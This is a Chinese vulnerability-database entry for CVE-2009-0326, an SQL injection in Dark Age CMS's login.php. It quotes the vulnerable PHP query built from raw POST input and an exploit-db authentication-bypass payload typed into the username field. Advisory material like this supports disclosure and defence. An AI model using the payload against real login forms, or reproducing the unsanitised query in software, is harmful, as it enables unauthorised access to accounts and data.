Dark Age CMS 'login.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117227 漏洞类型 SQL注入
发布时间 2009-01-13 更新时间 2009-01-29
CVE编号 CVE-2009-0326 CNNVD-ID CNNVD-200901-422
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-422
|漏洞详情
DarkAgeCMS0.2c测试第二版本中的login.php存在SQL注入漏洞。远程攻击者可以借助用户名和密码参数,执行任意的SQL指令。
|漏洞EXP
--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]	
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]	

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]
|参考资料

来源:XF
名称:darkagecms-login-sql-injection(48095)
链接:http://xforce.iss.net/xforce/xfdb/48095
来源:BID
名称:33271
链接:http://www.securityfocus.com/bid/33271